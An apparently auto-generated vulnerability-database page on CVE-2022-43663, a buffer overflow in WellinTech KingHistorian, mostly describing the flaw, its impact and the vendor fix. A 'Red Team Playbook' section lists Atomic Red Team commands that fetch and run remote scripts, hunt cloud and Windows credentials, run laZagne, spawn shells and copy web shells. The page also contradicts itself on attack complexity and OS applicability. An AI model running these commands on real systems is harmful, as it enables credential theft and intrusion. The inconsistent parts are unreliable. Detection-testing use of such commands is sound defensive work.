CVE-2022-43663
Overview
This vulnerability is a buffer overflow caused by improper integer conversion within the RecvPacket function of the SORBAx64.dll component in WellinTech KingHistorian 35.01.00.05. The root cause lies in the handling of network packet data where integer values are incorrectly converted, leading to memory corruption. The flaw specifically affects the packet reception mechanism in the SORBAx64.dll module responsible for processing incoming network packets.
Vulnerability Description
An integer conversion vulnerability exists in the SORBAx64.dll RecvPacket functionality of WellinTech KingHistorian 35.01.00.05. A specially crafted network packet can lead to a buffer overflow. An attacker can send a malicious packet to trigger this vulnerability.
Impact
An unauthenticated attacker with network access can exploit this vulnerability by sending crafted packets to trigger a buffer overflow, potentially enabling arbitrary code execution or denial of service. Since the attack vector is network-based and requires no user interaction or privileges, it allows remote exploitation with high impact on confidentiality, integrity, and availability as indicated by the CVSS vector (AV:N/AC:H/PR:N/UI:N). Successful exploitation could result in full system compromise or disruption of KingHistorian services.
Solution
WellinTech has released a security update addressing this integer conversion and buffer overflow issue in KingHistorian version 35.01.00.05. Users should apply the patch provided by the vendor as detailed in the Talos Intelligence advisory (TALOS-2022-1674) available at https://talosintelligence.com/vulnerability_reports/TALOS-2022-1674. The update replaces the vulnerable SORBAx64.dll component with a corrected version that includes proper input validation and integer handling. No alternative workarounds have been specified.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The integer conversion vulnerability in the SORBAx64.dll component of WellinTech KingHistorian version 35.01.00.05 presents a significant risk due to its potential to cause a buffer overflow. This vulnerability arises when the RecvPacket functionality improperly handles integer values during the processing of incoming network packets. Specifically, the flaw occurs when a crafted packet is received, leading to an overflow condition that can overwrite adjacent memory. This type of vulnerability is particularly dangerous as it can allow an attacker to execute arbitrary code, potentially gaining control over the affected system.
Attack vectors for exploiting this vulnerability primarily involve sending specially crafted network packets to the vulnerable application. An attacker could leverage this flaw remotely, requiring no physical access to the system. By designing a malicious packet that exploits the integer conversion issue, an attacker can trigger the buffer overflow, leading to unauthorized execution of code. This could result in the installation of malware, data exfiltration, or even complete system compromise. The ease of exploitation, combined with the high impact of a successful attack, makes this vulnerability a prime target for cybercriminals.
The real-world implications of this vulnerability are substantial, particularly for organizations relying on WellinTech KingHistorian for data collection and analysis in industrial environments. A successful exploitation could lead to significant operational disruptions, loss of sensitive data, and damage to the organization’s reputation. Furthermore, the high CVSS score of 9.8 indicates that this vulnerability poses a critical risk, necessitating immediate attention from cybersecurity teams. The potential for widespread impact is exacerbated by the fact that many industrial control systems may not have robust security measures in place, making them attractive targets for attackers.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching the affected software is essential to close the vulnerability. Additionally, network segmentation can help limit the exposure of critical systems to untrusted networks, reducing the likelihood of successful exploitation. Intrusion detection systems (IDS) should be configured to monitor for unusual packet patterns that may indicate an attempted attack. Organizations should also conduct regular security assessments and penetration testing to identify and remediate vulnerabilities in their environments proactively.
In conclusion, the integer conversion vulnerability in WellinTech KingHistorian poses a severe threat to organizations utilizing this software. The potential for remote exploitation through crafted network packets highlights the need for immediate action to mitigate risks. By adopting comprehensive detection and mitigation strategies, organizations can better protect their systems from the significant threats posed by this vulnerability, ensuring the integrity and availability of their critical data and operations.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Wellintech | Kinghistorian | 35.01.00.05 |
cpe:2.3:a:wellintech:kinghistorian:35.01.00.05:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-43663 |
| talosintelligence.com |
GitHub CVE
|
https://talosintelligence.com/vulnerability_reports/TALOS-2022-1674 |
| talosintelligence.com |
NVD API
|
https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1674 |